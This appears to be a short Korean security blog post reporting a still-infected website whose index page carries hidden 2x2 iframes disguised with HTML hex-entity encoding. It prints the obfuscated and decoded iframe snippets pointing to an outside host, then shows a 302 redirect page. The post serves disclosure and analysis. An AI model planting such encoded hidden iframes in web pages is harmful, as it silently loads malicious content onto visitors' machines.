Hex 코드로 위장하여 악성 Iframe이 삽입된 http://www.jeonju1318.or.kr
감염 사이트 : http://www.jeonju1318.or.kr
* 위 사이트는 현재도 감염중에 있습니다!
http://www.jeonju1318.or.kr/root/index.php
안에 현재 악성 스크립트가 존재하여서 글을 써 봅니다!
현재 감염된 페이니 내에 ! 이렇게 Hex 코드로 위장하여 Iframe이 삽입되었습니다!
src=http://apple.chol.(중략);l width=2 height=2></iframe><iframe src=http://apple.chol.c (중략) ; width=2 height=2></iframe><iframe src=http://apple.chol.co (중략) ; width=2 height=2></iframe><iframe src=http://apple.&#x
63;hol.co (중략) C; width=2
간단하게 Docode Hex 를 해주면 제대로 된 Iframe 를 보실 수 있습니다!
http://apple.chox.com/xml/index.html width=2 height=2></iframe>
<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>
<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>
<iframe src=http://apple.chox.com/xml/index.html
현재 페이지는 사라졌으며! 다시 페이지가 http://www.test.ccc Redirection 되고 있습니다!
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.test.ccc">here</a>.</p>
</body></html>
http://www.test.ccc
=========================
Server IP(s):
0.0.0.0
=========================